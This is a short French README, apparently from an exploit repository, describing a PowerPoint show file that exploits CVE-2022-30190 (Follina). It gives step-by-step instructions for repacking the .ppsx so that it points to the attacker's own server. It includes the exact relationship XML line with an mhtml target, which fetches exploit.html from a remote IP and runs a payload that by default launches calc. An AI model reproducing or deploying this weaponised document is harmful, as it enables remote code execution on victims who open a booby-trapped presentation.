
Ceci est un exploit de CVE-2022-30190 sur PowerPoint.
Ceci est un exploit de CVE-2022-30190 sur PowerPoint.
Modifiez le suffixe du fichier en 'zip' et décompressez le fichier, vous pouvez éditer \ppt\slides\_rels\slide1.xml.rels et remplacer par l'ip:port de votre vps comme ceci, puis recompressez de la même manière et changez le suffixe en 'ppsx'. La charge utile par défaut dans 'exploit.html' exécute calc.
<Relationship TargetMode="External" Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="mhtml:http://114.114.114.114:80/exploit.html!x-usc:http://114.114.114.114:80/exploit.html"/>
référence : https://github.com/chvancooten/follina.py